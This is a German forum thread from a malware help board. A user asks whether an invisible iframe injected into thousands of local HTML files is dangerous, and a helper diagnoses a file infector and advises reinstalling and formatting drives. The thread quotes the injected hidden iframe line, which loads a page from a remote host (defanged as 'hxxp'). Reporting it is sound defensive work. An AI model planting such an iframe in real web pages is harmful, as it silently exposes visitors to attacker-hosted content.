Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich? (https://www.trojaner-board.de/130060-js-iframe-bds-iframes-html-bereich-ueberhaupt-gefaehrlich.html)

ilios 25.01.2013 12:36

JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich?
 
Hallo,
Avira findet 9577 infizierte HTML-Dateien auf meinem Rechner. Alle enthalten den Trojan "JS/iframe.BDS". Es handelt sich um lokale Webseiten eines ziemlich großen (ca. 50GB) Softwarepakets. Wenn ich die alle in den Virenkäfig sperre, kann ich die Software nicht mehr benutzen.

Die Webseiten enthalten immer dieselbe Zeile, und sie wurde HINTER dem HTML-Teil angefügt:

<HTML>
...
<HTML>
<iframe src=hxxp://www.3-0b6f-415d-b5c7-832f0.com:888/tj.htm width=0 height=0></iframe>

Kann sie dort überhaupt etwas bewirken?

Gibt es eine einfache Möglichkeit, den Trojaner-Code aus den betroffenen Webseiten zu entfernen? Ich meine nicht von Hand mit notepad.exe oder so.

Viele Grüße,
Ilios

EDIT: mit SearchReplaceMaster geht das glaub ich, und mit diesem Monstereditor, der in LISP geschrieben wurde, wie heißt der gleich noch?

EDIT2: ach ja, EMACS, aber dafür braucht man einen Führerschein. SearchReplaceMaster ist glaub ich einfacher, werd's nachher mal probieren.

markusg 25.01.2013 12:52

hi
gabs noch andere Funde? ich würd mal behaupten, ihr habt einen file infektior auf dem pc, bzw evtl. falls firmen netz, im netzwerk (virus.Viking)

ilios 25.01.2013 14:52

Na ja, ich hab schon so einiges beseitigt. Angefangen hat alles mit einem Silly-Worm (WORM_VB.EQW) auf einem USB-Laufwerk. Ich dachte eigentlich, ich hätte Autostart ausgeschaltet, aber es muss wohl bei Systembereinigungsarbeiten wieder aktiviert worden sein.

Weil Avira den Silly nicht erkannt hat, hab ich MalwareBytes installiert. Der hat auch noch allerhand anderes böses Zeugs gefunden und beseitigt (Logfile hab ich noch).

Auf dem USB-Laufwerk war ein virtuelles System (vmplayer). Darin hab ich auch MalwareBytes installiert und laufen lassen, mit dem gleichen Ergebnis.

Dann habe ich das Programmpaket aus dem virtuellen System mit PCmover auf das Host-System übertragen. Erst da hat Avira die infizierten HTML-Dateien entdeckt.

Nun könnte man ja PCmover verdächtigen, ist aber sauber (sagt Avira).

Gruß,
Ilios

markusg 25.01.2013 17:07

du kannst das system neu aufsetzen, du hast ein file infektor, den bekommst du nicht sicher aus dem system, da er sich an einige datei typen anhängt, und usb sticks würd ich auch nicht verwenden, die du an dem betroffenen system hattest, die sind wohl auch infiziert.
ist das n firmen gerät? bist du da der admin oder habt ihr ne it?

ilios 25.01.2013 17:34

Das ist auf einem Laptop, ich wurschtele ganz allein, ohne IT Abteilung :-)

Ein anderer Laptop, wo ich das Laufwerk mal "angesteckt" hatte, war dadurch auch infiziert worden, aber den hab ich mit MalwareBytes wieder clean bekommen. Andere Scanner finden da auch nichts mehr.

Also, ob der Silly-Worm den JS/Iframe.BDS übertragen hat, glaube ich eigentlich auch nicht, die Iframes könnten schon länger drauf gewesen sein.

markusg 25.01.2013 17:37

Hi,
glauben ist hier auch nicht nötig, ich weis, dass diese einträge von den file infektoren stammen, die kannst du auch nicht mit malware bytes aufspüren bzw kann malware bytes solche Dateien gar nicht bereinigen.
alle sticks, die während der infektion angeschlossen waren, an beiden geräten, dürfen nicht an andere geräte, sie müssen formatiert werden.
auch die beiden Laptops
als firma hast du hoffendlich backups?


Alle Zeitangaben in WEZ +1. Es ist jetzt 04:11 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131